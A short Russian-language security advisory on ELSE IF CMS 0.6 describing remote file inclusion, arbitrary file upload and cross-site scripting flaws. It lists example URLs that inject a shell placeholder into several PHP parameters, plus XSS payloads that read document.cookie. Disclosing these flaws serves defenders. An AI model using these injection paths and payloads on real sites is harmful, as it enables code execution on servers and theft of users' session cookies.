Программа: ELSE IF CMS 0.6

Уязвимость позволяет удаленному пользователю осуществить XSS нападение, загрузить произвольные файлы на целевую систему и выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных множественными сценариями, например, contenus.php, votes.php, espaceperso.php, enregistrement.php, coeurusr.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

elseif/contenus.php?contenus=[Shell]
elseif/utilisateurs/votes.php?tpelseifportalrepertoire=[Shell]
elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=[Shell]
elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=[Shell]
elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=[Shell]
elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=[Shell]
elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=[Shell]
elseif/moduleajouter/articles/usrarticles.php?corpsdesign=[Sh3ll]
elseif/moduleajouter/depot/usrdepot.php?corpsdesign[Sh3ll]
elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=[Shell]

2) Уязвимость существует из-за недостаточной обработки входных данных сценарием, upload.php. Удаленный пользователь может загрузить произвольные файлы на целевую систему.

Эксплоит

3) Уязвимость существует из-за недостаточной обработки входных данных сценариями vousetesbannis.php, votesresultats.php, adminforum.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

elseif/utilisateurs/vousetesbannis.php?repertimage="><script>alert(document.cookie);</script><"
elseif/utilisateurs/votesresultats.php?elseifvotetxtresultatduvote=<script>alert(document.cookie);</script>
elseif/moduleajouter/depot/adminforum.php?elseifforumtxtmenugeneraleduforum=<script>alert(document.cookie);</script>



Оставить мнение